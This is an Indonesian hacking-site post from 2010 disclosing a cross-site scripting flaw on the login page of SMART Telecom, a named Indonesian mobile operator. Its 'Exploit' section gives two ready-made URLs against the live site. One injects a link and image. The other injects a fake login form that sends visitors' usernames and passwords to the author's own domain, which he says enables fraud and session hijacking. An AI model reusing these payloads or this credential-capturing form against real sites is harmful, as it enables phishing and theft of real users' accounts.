[HOME]

WWW.SPYROZONE.NET

[306]. SMART TELECOM Vulnerable to XSS

---------------------------------------------------------------------------------

Author  : SPYRO KiD

Contact : root{~@~}spyrozone.net

CopyLEFT (c) 2010++ www.spyrozone.net All Rights Reserved

04/08/2010 7.45.40 WIB

---------------------------------------------------------------------------------

Preface

SMART merupakan Operator jaringan seluler CDMA di pulau Jawa. Website resminya (http://smart-telecom.co.id/) berisi informasi pengaturan modem dan WAP, layanan informasi tagihan dan registrasi.

Saya mendapati kelemahan Cross Site Scripting (XSS) pada halaman login SMART yang memungkinkan pihak-pihak yang tidak bertanggung jawab memanfaatkan kelemahan tersebut untuk tujuan penipuan dan melakukan pembajakan sesi (session hijacking).  

Exploit

~ XSS test

http://smart-telecom.co.id/login_page.php?error=%3Ca%20href=%22http://www.spyrozone.net%22%3E%3Cimg%20border=%220%22%20src=%22http://spyrozone.net/sz/www.spyrozone.net_109x63.gif%22%20alt=%22www.spyrozone.net%20-%20Hacking%20and%20Computer%20Security%20Resources%22%3E%3C/a%3E

Screenshot:

~ Fake Login

http://smart-telecom.co.id/login_page.php?error=%3C/form%3E%3Cform%20action=%22http://www.spyrozone.net%22%20method=%22post%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUser%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22text%22%20name=%22username%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22password%22%20name=%22password%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3Cnoscript%3E

Screenshot:

Penutup

Exploitasi lebih lanjut dapat Anda baca pada artikel-artikel terdahulu spyrozone.net

Semoga bermanfaat..... :)

E.O.F

 WWW.SPYROZONE.NET